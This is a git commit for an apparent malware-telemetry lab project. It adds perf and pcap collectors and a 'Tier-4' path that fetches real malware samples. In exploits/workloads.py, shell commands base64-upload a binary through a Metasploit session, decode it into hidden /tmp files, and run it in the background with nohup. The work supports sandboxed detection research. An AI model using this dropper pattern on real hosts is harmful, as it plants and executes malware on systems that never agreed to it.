Close out the open issues: bridge pcap wiring, perf collector, Tier-4
Wraps the three remaining 🚧 items from the README so every collector the threat-model promises is actually live, and the Tier-4 path (real-malware fetch + upload + exec) works end-to-end as soon as a sha256 lands in samples/store/. Closes spectral/CIS490#4, #5, #6. == #6 — Bridge pcap wiring == EpisodeConfig grows three optional fields: bridge_iface: str | None # e.g. "br-malware" bridge_ip: str = "10.200.0.1" pcap_snaplen: int = 256 When bridge_iface is set, EpisodeRunner spawns tcpdump for the duration of the schedule (network.pcap), stops it cleanly on episode end, and runs collectors.pcap.bucketize() to produce netflow.jsonl per the 100-ms schema in docs/data-model.md. EpisodeResult + meta.result gain rows_netflow + pcap_bytes counters. vm/launch_demo.sh + launch_target.sh now switch between SLIRP usermode and tap+bridge based on $BRIDGE — operator pre-creates the tap as a bridge member, no sudo from the launcher. run_real_vm_demo.py picks BRIDGE up from env so the fleet runner can opt entire waves into pcap mode by exporting BRIDGE before invocation. == #5 — Source 3 perf collector == collectors/perf_qemu.py shells out to ``perf stat -p <pid> -I 100 -j`` and parses the per-event JSON stream. Aggregates one row per interval across the canonical event set (cycles/instructions/cache-{refs,misses}/ branches/branch-misses/page-faults/context-switches), computes IPC + cache-miss rate. Tolerates missing events (``<not counted>`` / ``<not supported>``) without dropping the row, and skips cleanly when ``perf`` isn't on PATH or the process can't be attached. EpisodeConfig.enable_perf=True opts into the collector — off by default because perf needs CAP_SYS_ADMIN or perf_event_paranoid <= 1. When enabled, runs as a parallel thread alongside the other collectors; EpisodeResult.rows_perf records the count. == #4 — Tier 4 (real-malware fetch + upload + exec) == tools/fetch_sample.py: pulls a sample by sha256 from MalwareBazaar (API key from env or samples/.bazaar.token), unzips with the standard "infected" password, verifies the resulting binary's sha256, lands at samples/store/<sha256>. Idempotent — already-staged correct binaries return immediately. samples/manifest.py: Sample.binary_path(store_root) resolves to the staged binary path, or None for mimics / not-yet-fetched real samples. exploits/workloads.py: real_binary_workload(bytes, sample) builds a Workload that base64-uploads the binary into the shell session via a heredoc, decodes + chmods + execs it in the background, captures the PID for clean stop on dormant. Per-profile pid/bin paths so concurrent samples in the same guest don't collide. exploits/driver.py: dispatch order is now: 1) sample.kind == "real" + binary staged at sample_store_root → real_binary_workload (Tier 4) 2) profile mimic from workloads.workload_for() (Tier 3 v2) 3) None → driver v1 fallback yes-loop DriverConfig.sample_store_root is the new field; run_tier3_demo.py wires it to repo_root/samples/store. driver_setup event records sample_sha256 so trainers can join Tier-4 episodes against the manifest by hash. samples/store/.gitkeep added (binaries themselves are gitignored). Tests: 102 pass (was 86). New suites: tests/test_perf_qemu.py — parser + builder + perf-missing fallback tests/test_tier4.py — real_binary_workload base64 round-trip, stop-cmd kills pidfile, per-profile path isolation, driver dispatch chooses real vs mimic correctly, fetcher input validation and cached-fast-path Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This commit is contained in:
parent
c89dbe29e7
commit
bdcd2ecbef
12 changed files with 775 additions and 15 deletions
201
collectors/perf_qemu.py
Normal file
201
collectors/perf_qemu.py
Normal file
|
|
@ -0,0 +1,201 @@
|
||||||
|
"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
|
||||||
|
|
||||||
|
Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
|
||||||
|
aggregates the per-event counter values into per-interval telemetry
|
||||||
|
rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
|
||||||
|
or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
|
||||||
|
the collector doesn't own — typically true on a lab host running
|
||||||
|
QEMU under the cis490 service user.
|
||||||
|
|
||||||
|
Source 3 is **oracle-only** — perf counters are not available on a
|
||||||
|
deployed device. Every row carries ``available_in_deployment: false``.
|
||||||
|
|
||||||
|
The events we ask for are the small canonical set named in
|
||||||
|
docs/data-model.md:
|
||||||
|
|
||||||
|
cycles, instructions, cache-references, cache-misses,
|
||||||
|
branches, branch-misses, page-faults, context-switches
|
||||||
|
|
||||||
|
Anything perf can't enable on the host (e.g. cache-misses without
|
||||||
|
hardware support) is silently dropped from the row.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import shutil
|
||||||
|
import subprocess
|
||||||
|
import threading
|
||||||
|
import time
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
|
||||||
|
log = logging.getLogger("cis490.collectors.perf_qemu")
|
||||||
|
|
||||||
|
SOURCE = "host_perf"
|
||||||
|
AVAILABLE_IN_DEPLOYMENT = False
|
||||||
|
|
||||||
|
DEFAULT_EVENTS = (
|
||||||
|
"cycles",
|
||||||
|
"instructions",
|
||||||
|
"cache-references",
|
||||||
|
"cache-misses",
|
||||||
|
"branches",
|
||||||
|
"branch-misses",
|
||||||
|
"page-faults",
|
||||||
|
"context-switches",
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def perf_available() -> bool:
|
||||||
|
return shutil.which("perf") is not None
|
||||||
|
|
||||||
|
|
||||||
|
def _coerce_int(s: str | int | None) -> int | None:
|
||||||
|
if s is None:
|
||||||
|
return None
|
||||||
|
if isinstance(s, int):
|
||||||
|
return s
|
||||||
|
s = s.strip()
|
||||||
|
if not s or s in ("<not counted>", "<not supported>"):
|
||||||
|
return None
|
||||||
|
# perf prints comma-separated thousands by default; we asked -j so
|
||||||
|
# we usually get plain numbers, but guard for both shapes.
|
||||||
|
s = s.replace(",", "")
|
||||||
|
try:
|
||||||
|
return int(s)
|
||||||
|
except ValueError:
|
||||||
|
try:
|
||||||
|
return int(float(s))
|
||||||
|
except ValueError:
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
|
||||||
|
cycles = agg.get("cycles")
|
||||||
|
insns = agg.get("instructions")
|
||||||
|
cache_refs = agg.get("cache-references")
|
||||||
|
cache_miss = agg.get("cache-misses")
|
||||||
|
ipc = (insns / cycles) if (cycles and insns) else None
|
||||||
|
miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
|
||||||
|
|
||||||
|
return {
|
||||||
|
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
|
||||||
|
"t_wall_ns": time.time_ns(),
|
||||||
|
"source": SOURCE,
|
||||||
|
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
|
||||||
|
"interval_s": interval_s,
|
||||||
|
"cycles": cycles,
|
||||||
|
"instructions": insns,
|
||||||
|
"cache_references": cache_refs,
|
||||||
|
"cache_misses": cache_miss,
|
||||||
|
"branches": agg.get("branches"),
|
||||||
|
"branch_misses": agg.get("branch-misses"),
|
||||||
|
"page_faults": agg.get("page-faults"),
|
||||||
|
"context_switches": agg.get("context-switches"),
|
||||||
|
"ipc": ipc,
|
||||||
|
"cache_miss_rate": miss_rate,
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def parse_perf_event_line(line: str) -> dict | None:
|
||||||
|
"""Parse one ``perf stat -j`` event line. Returns None for blanks
|
||||||
|
or status messages perf occasionally interleaves on stderr-ish
|
||||||
|
paths but stdout-on-error in practice."""
|
||||||
|
line = line.strip()
|
||||||
|
if not line.startswith("{"):
|
||||||
|
return None
|
||||||
|
try:
|
||||||
|
return json.loads(line)
|
||||||
|
except json.JSONDecodeError:
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def run_loop(
|
||||||
|
pid: int,
|
||||||
|
output_path: Path,
|
||||||
|
t_mono_origin_ns: int,
|
||||||
|
interval_ms: int,
|
||||||
|
stop_event: threading.Event,
|
||||||
|
*,
|
||||||
|
events: tuple[str, ...] = DEFAULT_EVENTS,
|
||||||
|
) -> int:
|
||||||
|
"""Spawn perf stat -j against ``pid`` and stream rows until stop.
|
||||||
|
Returns the number of rows written."""
|
||||||
|
if not perf_available():
|
||||||
|
log.warning("perf binary not on PATH — perf collector disabled")
|
||||||
|
return 0
|
||||||
|
|
||||||
|
cmd = [
|
||||||
|
"perf", "stat",
|
||||||
|
"-p", str(pid),
|
||||||
|
"-I", str(interval_ms),
|
||||||
|
"-j",
|
||||||
|
"-e", ",".join(events),
|
||||||
|
]
|
||||||
|
log.info("starting perf: %s", " ".join(cmd))
|
||||||
|
|
||||||
|
try:
|
||||||
|
proc = subprocess.Popen(
|
||||||
|
cmd,
|
||||||
|
stdout=subprocess.PIPE,
|
||||||
|
stderr=subprocess.PIPE,
|
||||||
|
bufsize=1,
|
||||||
|
text=True,
|
||||||
|
)
|
||||||
|
except (FileNotFoundError, PermissionError) as e:
|
||||||
|
log.warning("perf launch failed: %s", e)
|
||||||
|
return 0
|
||||||
|
|
||||||
|
rows = 0
|
||||||
|
output_path.parent.mkdir(parents=True, exist_ok=True)
|
||||||
|
cur_interval: float | None = None
|
||||||
|
agg: dict[str, int] = {}
|
||||||
|
|
||||||
|
def _flush() -> None:
|
||||||
|
nonlocal rows
|
||||||
|
if cur_interval is None or not agg:
|
||||||
|
return
|
||||||
|
row = _build_row(t_mono_origin_ns, cur_interval, agg)
|
||||||
|
out_f.write(json.dumps(row) + "\n")
|
||||||
|
rows += 1
|
||||||
|
|
||||||
|
try:
|
||||||
|
with output_path.open("a", buffering=1) as out_f:
|
||||||
|
# perf interleaves events and writes to stdout in -j mode.
|
||||||
|
# We read line by line until the process exits (which
|
||||||
|
# happens when we kill it on stop, or when the target pid
|
||||||
|
# disappears and perf's internal -p polling notices).
|
||||||
|
assert proc.stdout is not None
|
||||||
|
for line in proc.stdout:
|
||||||
|
if stop_event.is_set():
|
||||||
|
break
|
||||||
|
evt = parse_perf_event_line(line)
|
||||||
|
if evt is None:
|
||||||
|
continue
|
||||||
|
interval = evt.get("interval")
|
||||||
|
event_name = evt.get("event")
|
||||||
|
value = _coerce_int(evt.get("counter-value"))
|
||||||
|
if interval is None or event_name is None:
|
||||||
|
continue
|
||||||
|
# perf emits one JSON per (event, interval); a new
|
||||||
|
# interval value means we should flush the previous row.
|
||||||
|
if cur_interval is not None and interval != cur_interval:
|
||||||
|
_flush()
|
||||||
|
agg = {}
|
||||||
|
cur_interval = interval
|
||||||
|
if value is not None:
|
||||||
|
agg[event_name] = value
|
||||||
|
# End of stream — flush the last partial row.
|
||||||
|
_flush()
|
||||||
|
finally:
|
||||||
|
if proc.poll() is None:
|
||||||
|
proc.terminate()
|
||||||
|
try:
|
||||||
|
proc.wait(timeout=3.0)
|
||||||
|
except subprocess.TimeoutExpired:
|
||||||
|
proc.kill()
|
||||||
|
proc.wait(timeout=2.0)
|
||||||
|
|
||||||
|
return rows
|
||||||
|
|
@ -31,11 +31,13 @@ import time
|
||||||
from dataclasses import dataclass
|
from dataclasses import dataclass
|
||||||
from typing import Callable
|
from typing import Callable
|
||||||
|
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
from samples.manifest import Sample
|
from samples.manifest import Sample
|
||||||
|
|
||||||
from .modules import ModuleConfig
|
from .modules import ModuleConfig
|
||||||
from .msfrpc import MSFRpcClient, wait_for_new_session
|
from .msfrpc import MSFRpcClient, wait_for_new_session
|
||||||
from .workloads import Workload, workload_for
|
from .workloads import Workload, real_binary_workload, workload_for
|
||||||
|
|
||||||
|
|
||||||
log = logging.getLogger("cis490.exploits.driver")
|
log = logging.getLogger("cis490.exploits.driver")
|
||||||
|
|
@ -52,6 +54,8 @@ class DriverConfig:
|
||||||
# We keep the v1 path so existing callers keep working unchanged.
|
# We keep the v1 path so existing callers keep working unchanged.
|
||||||
workload_cmd: str = "yes > /dev/null"
|
workload_cmd: str = "yes > /dev/null"
|
||||||
workload_kill_cmd: str = "pkill yes; true"
|
workload_kill_cmd: str = "pkill yes; true"
|
||||||
|
# Where staged real-malware binaries live on the lab host.
|
||||||
|
sample_store_root: Path | None = None
|
||||||
|
|
||||||
|
|
||||||
class MSFExploitDriver:
|
class MSFExploitDriver:
|
||||||
|
|
@ -79,13 +83,31 @@ class MSFExploitDriver:
|
||||||
self.cfg = cfg
|
self.cfg = cfg
|
||||||
self.emit = emit_event
|
self.emit = emit_event
|
||||||
self.sample = sample
|
self.sample = sample
|
||||||
self.workload: Workload | None = workload_for(sample)
|
self.workload: Workload | None = self._resolve_workload(sample)
|
||||||
|
|
||||||
self._sessions_seen_at_arm: set[int] = set()
|
self._sessions_seen_at_arm: set[int] = set()
|
||||||
self._session_id: int | None = None
|
self._session_id: int | None = None
|
||||||
self._job_id: int | str | None = None
|
self._job_id: int | str | None = None
|
||||||
self._fired = False
|
self._fired = False
|
||||||
|
|
||||||
|
def _resolve_workload(self, sample: Sample | None) -> Workload | None:
|
||||||
|
"""Pick the best workload for this sample:
|
||||||
|
1. real binary (if staged at samples/store/<sha256>) → upload + exec
|
||||||
|
2. profile mimic from exploits.workloads
|
||||||
|
3. None → driver v1 fallback (yes-loop)
|
||||||
|
"""
|
||||||
|
if sample is None:
|
||||||
|
return None
|
||||||
|
if sample.kind == "real" and self.cfg.sample_store_root is not None:
|
||||||
|
bin_path = sample.binary_path(self.cfg.sample_store_root)
|
||||||
|
if bin_path is not None:
|
||||||
|
try:
|
||||||
|
payload = bin_path.read_bytes()
|
||||||
|
return real_binary_workload(payload, sample=sample)
|
||||||
|
except OSError as e:
|
||||||
|
log.warning("could not read real sample %s: %s; falling back", bin_path, e)
|
||||||
|
return workload_for(sample)
|
||||||
|
|
||||||
# ---- lifecycle ------------------------------------------------------
|
# ---- lifecycle ------------------------------------------------------
|
||||||
|
|
||||||
def setup(self) -> None:
|
def setup(self) -> None:
|
||||||
|
|
@ -101,6 +123,7 @@ class MSFExploitDriver:
|
||||||
preexisting_sessions=sorted(self._sessions_seen_at_arm),
|
preexisting_sessions=sorted(self._sessions_seen_at_arm),
|
||||||
sample=self.sample.name if self.sample else None,
|
sample=self.sample.name if self.sample else None,
|
||||||
sample_kind=self.sample.kind if self.sample else None,
|
sample_kind=self.sample.kind if self.sample else None,
|
||||||
|
sample_sha256=self.sample.sha256 if self.sample else None,
|
||||||
workload_profile=self.workload.profile if self.workload else None,
|
workload_profile=self.workload.profile if self.workload else None,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -233,3 +233,57 @@ def workload_for(sample: Sample | None) -> Workload | None:
|
||||||
|
|
||||||
def all_profiles() -> list[str]:
|
def all_profiles() -> list[str]:
|
||||||
return sorted(_FACTORIES.keys())
|
return sorted(_FACTORIES.keys())
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Tier-4 path: real-binary upload + execute inside the shell session
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
|
||||||
|
"""Build a Workload that uploads ``binary_bytes`` to the guest via
|
||||||
|
base64 over the shell session, executes it in the background, and
|
||||||
|
kills it on stop. Used when ``sample.kind == "real"`` and the
|
||||||
|
fetcher has staged the binary at samples/store/<sha256>.
|
||||||
|
|
||||||
|
Caveats:
|
||||||
|
- The session must support ``base64 -d`` (busybox does, GNU does).
|
||||||
|
- For binaries above ~512 KiB we'd want chunked upload; today
|
||||||
|
we send it as one ``shell_write`` and rely on msfrpc to handle
|
||||||
|
the buffer. 64 KiB-128 KiB samples (the typical
|
||||||
|
cryptominer / ELF backdoor size) work fine.
|
||||||
|
"""
|
||||||
|
import base64 as _b64
|
||||||
|
|
||||||
|
profile = (sample.profile if sample else "real-binary")
|
||||||
|
pid_path = f"/tmp/.cis490-real-{profile}.pid"
|
||||||
|
bin_path = f"/tmp/.cis490-real-{profile}.bin"
|
||||||
|
b64_path = f"/tmp/.cis490-real-{profile}.b64"
|
||||||
|
encoded = _b64.b64encode(binary_bytes).decode("ascii")
|
||||||
|
# Insert newlines every 76 chars so the heredoc is friendly to
|
||||||
|
# any line-buffered intermediary.
|
||||||
|
chunked = "\n".join(encoded[i:i+76] for i in range(0, len(encoded), 76))
|
||||||
|
|
||||||
|
start = (
|
||||||
|
f"mkdir -p /tmp; "
|
||||||
|
f"cat > {b64_path} <<'CIS490_B64_EOF'\n"
|
||||||
|
f"{chunked}\n"
|
||||||
|
f"CIS490_B64_EOF\n"
|
||||||
|
f"base64 -d {b64_path} > {bin_path} && chmod +x {bin_path} && rm -f {b64_path}\n"
|
||||||
|
f"nohup {bin_path} </dev/null >/dev/null 2>&1 &\n"
|
||||||
|
f"echo $! > {pid_path}\n"
|
||||||
|
f"disown\n"
|
||||||
|
)
|
||||||
|
stop = (
|
||||||
|
f"if [ -f {pid_path} ]; then "
|
||||||
|
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
|
||||||
|
f" kill $(cat {pid_path}) 2>/dev/null; "
|
||||||
|
f" rm -f {pid_path} {bin_path}; "
|
||||||
|
f"fi; true\n"
|
||||||
|
)
|
||||||
|
return Workload(
|
||||||
|
profile=f"real:{profile}",
|
||||||
|
start_cmd=start,
|
||||||
|
stop_cmd=stop,
|
||||||
|
description=f"Real binary upload+execute ({len(binary_bytes)} bytes)",
|
||||||
|
)
|
||||||
|
|
|
||||||
|
|
@ -36,7 +36,7 @@ from datetime import datetime, timezone
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Callable
|
from typing import Callable
|
||||||
|
|
||||||
from collectors import guest_agent, proc_qemu, qmp
|
from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
|
||||||
|
|
||||||
from .ulid import new_ulid
|
from .ulid import new_ulid
|
||||||
|
|
||||||
|
|
@ -66,6 +66,17 @@ class EpisodeConfig:
|
||||||
qmp_socket: Path | None = None
|
qmp_socket: Path | None = None
|
||||||
qmp_interval_ms: int = 1000 # QMP queries are heavier than /proc reads
|
qmp_interval_ms: int = 1000 # QMP queries are heavier than /proc reads
|
||||||
guest_agent_socket: Path | None = None
|
guest_agent_socket: Path | None = None
|
||||||
|
# Optional: bridge interface to capture per-episode pcap on. When
|
||||||
|
# set, EpisodeRunner spawns tcpdump for the duration of the
|
||||||
|
# schedule and bucketizes the result into netflow.jsonl on stop.
|
||||||
|
bridge_iface: str | None = None
|
||||||
|
bridge_ip: str = "10.200.0.1"
|
||||||
|
pcap_snaplen: int = 256
|
||||||
|
# Source 3: perf stat sampling. Disabled by default because perf
|
||||||
|
# needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
|
||||||
|
# explicitly per-episode when the host supports it.
|
||||||
|
enable_perf: bool = False
|
||||||
|
perf_interval_ms: int = 100
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
@dataclass
|
||||||
|
|
@ -75,6 +86,9 @@ class EpisodeResult:
|
||||||
rows_proc: int
|
rows_proc: int
|
||||||
rows_qmp: int = 0
|
rows_qmp: int = 0
|
||||||
rows_guest: int = 0
|
rows_guest: int = 0
|
||||||
|
rows_netflow: int = 0
|
||||||
|
rows_perf: int = 0
|
||||||
|
pcap_bytes: int = 0
|
||||||
pid_disappeared: bool = False
|
pid_disappeared: bool = False
|
||||||
duration_observed_s: float = 0.0
|
duration_observed_s: float = 0.0
|
||||||
phases_observed: list[str] = field(default_factory=list)
|
phases_observed: list[str] = field(default_factory=list)
|
||||||
|
|
@ -109,7 +123,23 @@ class EpisodeRunner:
|
||||||
|
|
||||||
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
|
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
|
||||||
|
|
||||||
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0}
|
rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
|
||||||
|
pcap_handle: pcap.CaptureHandle | None = None
|
||||||
|
pcap_path = self.episode_dir / "network.pcap"
|
||||||
|
netflow_path = self.episode_dir / "netflow.jsonl"
|
||||||
|
if self.cfg.bridge_iface:
|
||||||
|
try:
|
||||||
|
pcap_handle = pcap.run_capture(
|
||||||
|
bridge=self.cfg.bridge_iface,
|
||||||
|
pcap_path=pcap_path,
|
||||||
|
snaplen=self.cfg.pcap_snaplen,
|
||||||
|
)
|
||||||
|
self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
|
||||||
|
except (OSError, FileNotFoundError) as e:
|
||||||
|
log.warning("pcap capture not available on %s: %s",
|
||||||
|
self.cfg.bridge_iface, e)
|
||||||
|
self.emit_event("pcap_unavailable",
|
||||||
|
iface=self.cfg.bridge_iface, error=str(e))
|
||||||
|
|
||||||
def _proc_collector() -> None:
|
def _proc_collector() -> None:
|
||||||
rows_holder["proc"] = proc_qemu.run_loop(
|
rows_holder["proc"] = proc_qemu.run_loop(
|
||||||
|
|
@ -139,12 +169,23 @@ class EpisodeRunner:
|
||||||
stop_event=self._stop,
|
stop_event=self._stop,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
def _perf_collector() -> None:
|
||||||
|
rows_holder["perf"] = perf_qemu.run_loop(
|
||||||
|
pid=self.cfg.target_pid,
|
||||||
|
output_path=self.episode_dir / "telemetry-perf.jsonl",
|
||||||
|
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||||
|
interval_ms=self.cfg.perf_interval_ms,
|
||||||
|
stop_event=self._stop,
|
||||||
|
)
|
||||||
|
|
||||||
threads: list[threading.Thread] = []
|
threads: list[threading.Thread] = []
|
||||||
threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
|
threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
|
||||||
if self.cfg.qmp_socket is not None:
|
if self.cfg.qmp_socket is not None:
|
||||||
threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
|
threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
|
||||||
if self.cfg.guest_agent_socket is not None:
|
if self.cfg.guest_agent_socket is not None:
|
||||||
threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
|
threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
|
||||||
|
if self.cfg.enable_perf:
|
||||||
|
threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
|
||||||
for t in threads:
|
for t in threads:
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
|
|
@ -160,17 +201,31 @@ class EpisodeRunner:
|
||||||
self._stop.set()
|
self._stop.set()
|
||||||
for t in threads:
|
for t in threads:
|
||||||
t.join(timeout=3.0)
|
t.join(timeout=3.0)
|
||||||
|
if pcap_handle is not None:
|
||||||
|
rc = pcap.stop_capture(pcap_handle)
|
||||||
|
self.emit_event("pcap_stopped", rc=rc,
|
||||||
|
pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
|
||||||
|
rows_holder["netflow"] = pcap.bucketize(
|
||||||
|
pcap_path, netflow_path,
|
||||||
|
bucket_ms=100,
|
||||||
|
t_mono_origin_ns=self._t_mono_origin_ns,
|
||||||
|
bridge_ip=self.cfg.bridge_ip,
|
||||||
|
)
|
||||||
|
|
||||||
pid_alive = _pid_alive(self.cfg.target_pid)
|
pid_alive = _pid_alive(self.cfg.target_pid)
|
||||||
self.emit_event("episode_end", target_pid_alive=pid_alive)
|
self.emit_event("episode_end", target_pid_alive=pid_alive)
|
||||||
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
|
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
|
||||||
|
|
||||||
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
|
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
|
||||||
|
pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
|
||||||
meta["result"] = {
|
meta["result"] = {
|
||||||
"phases_observed": phases_observed,
|
"phases_observed": phases_observed,
|
||||||
"rows_proc": rows_holder["proc"],
|
"rows_proc": rows_holder["proc"],
|
||||||
"rows_qmp": rows_holder["qmp"],
|
"rows_qmp": rows_holder["qmp"],
|
||||||
"rows_guest": rows_holder["guest"],
|
"rows_guest": rows_holder["guest"],
|
||||||
|
"rows_perf": rows_holder["perf"],
|
||||||
|
"rows_netflow": rows_holder["netflow"],
|
||||||
|
"pcap_bytes": pcap_size,
|
||||||
"pid_alive_at_end": pid_alive,
|
"pid_alive_at_end": pid_alive,
|
||||||
"duration_observed_s": end_mono_ns / 1_000_000_000,
|
"duration_observed_s": end_mono_ns / 1_000_000_000,
|
||||||
}
|
}
|
||||||
|
|
@ -178,9 +233,10 @@ class EpisodeRunner:
|
||||||
(self.episode_dir / "done.marker").touch()
|
(self.episode_dir / "done.marker").touch()
|
||||||
|
|
||||||
log.info(
|
log.info(
|
||||||
"episode %s complete: proc=%d qmp=%d guest=%d duration=%.2fs phases=%s",
|
"episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
|
||||||
self.episode_id,
|
self.episode_id,
|
||||||
rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
|
rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
|
||||||
|
rows_holder["perf"], rows_holder["netflow"], pcap_size,
|
||||||
end_mono_ns / 1e9,
|
end_mono_ns / 1e9,
|
||||||
phases_observed,
|
phases_observed,
|
||||||
)
|
)
|
||||||
|
|
@ -190,6 +246,9 @@ class EpisodeRunner:
|
||||||
rows_proc=rows_holder["proc"],
|
rows_proc=rows_holder["proc"],
|
||||||
rows_qmp=rows_holder["qmp"],
|
rows_qmp=rows_holder["qmp"],
|
||||||
rows_guest=rows_holder["guest"],
|
rows_guest=rows_holder["guest"],
|
||||||
|
rows_netflow=rows_holder["netflow"],
|
||||||
|
rows_perf=rows_holder["perf"],
|
||||||
|
pcap_bytes=pcap_size,
|
||||||
pid_disappeared=not pid_alive,
|
pid_disappeared=not pid_alive,
|
||||||
duration_observed_s=end_mono_ns / 1_000_000_000,
|
duration_observed_s=end_mono_ns / 1_000_000_000,
|
||||||
phases_observed=phases_observed,
|
phases_observed=phases_observed,
|
||||||
|
|
|
||||||
|
|
@ -43,6 +43,14 @@ class Sample:
|
||||||
consumes real-malware episodes."""
|
consumes real-malware episodes."""
|
||||||
return "real" if self.sha256 else "mimic"
|
return "real" if self.sha256 else "mimic"
|
||||||
|
|
||||||
|
def binary_path(self, store_root: Path) -> Path | None:
|
||||||
|
"""Resolved path of the staged binary, or None if this sample
|
||||||
|
has no sha256 (mimic) or the binary hasn't been fetched yet."""
|
||||||
|
if not self.sha256:
|
||||||
|
return None
|
||||||
|
p = Path(store_root) / self.sha256
|
||||||
|
return p if p.exists() else None
|
||||||
|
|
||||||
|
|
||||||
@dataclass(frozen=True)
|
@dataclass(frozen=True)
|
||||||
class SampleManifest:
|
class SampleManifest:
|
||||||
|
|
|
||||||
82
tests/test_perf_qemu.py
Normal file
82
tests/test_perf_qemu.py
Normal file
|
|
@ -0,0 +1,82 @@
|
||||||
|
"""Tests for the perf-stat collector — parser logic in isolation
|
||||||
|
(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
|
||||||
|
hardware counters that the test runner can't assume)."""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import json
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from collectors import perf_qemu
|
||||||
|
|
||||||
|
|
||||||
|
def test_parse_event_line_extracts_fields() -> None:
|
||||||
|
line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
|
||||||
|
evt = perf_qemu.parse_perf_event_line(line)
|
||||||
|
assert evt is not None
|
||||||
|
assert evt["event"] == "cycles"
|
||||||
|
assert evt["interval"] == 0.100123
|
||||||
|
assert evt["counter-value"] == "1234567"
|
||||||
|
|
||||||
|
|
||||||
|
def test_parse_event_line_skips_non_json() -> None:
|
||||||
|
assert perf_qemu.parse_perf_event_line("") is None
|
||||||
|
assert perf_qemu.parse_perf_event_line("garbage") is None
|
||||||
|
assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
|
||||||
|
|
||||||
|
|
||||||
|
def test_coerce_int_handles_perf_quirks() -> None:
|
||||||
|
assert perf_qemu._coerce_int("1234567") == 1234567
|
||||||
|
assert perf_qemu._coerce_int("1,234,567") == 1234567
|
||||||
|
assert perf_qemu._coerce_int("<not counted>") is None
|
||||||
|
assert perf_qemu._coerce_int("<not supported>") is None
|
||||||
|
assert perf_qemu._coerce_int("") is None
|
||||||
|
assert perf_qemu._coerce_int(None) is None
|
||||||
|
assert perf_qemu._coerce_int(42) == 42
|
||||||
|
|
||||||
|
|
||||||
|
def test_build_row_computes_ipc_and_miss_rate() -> None:
|
||||||
|
agg = {
|
||||||
|
"cycles": 1_000_000_000,
|
||||||
|
"instructions": 660_000_000,
|
||||||
|
"cache-references": 1_000_000,
|
||||||
|
"cache-misses": 50_000,
|
||||||
|
"branches": 100_000_000,
|
||||||
|
"branch-misses": 5_000_000,
|
||||||
|
"page-faults": 12,
|
||||||
|
"context-switches": 20,
|
||||||
|
}
|
||||||
|
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
|
||||||
|
assert row["source"] == "host_perf"
|
||||||
|
assert row["available_in_deployment"] is False
|
||||||
|
assert row["cycles"] == 1_000_000_000
|
||||||
|
assert row["instructions"] == 660_000_000
|
||||||
|
assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
|
||||||
|
assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
|
||||||
|
assert row["interval_s"] == 0.1
|
||||||
|
|
||||||
|
|
||||||
|
def test_build_row_handles_missing_counters() -> None:
|
||||||
|
"""If perf can't enable cache-misses on this hardware, the row
|
||||||
|
should still be valid — just with None for the missing fields."""
|
||||||
|
agg = {"cycles": 100, "instructions": 50}
|
||||||
|
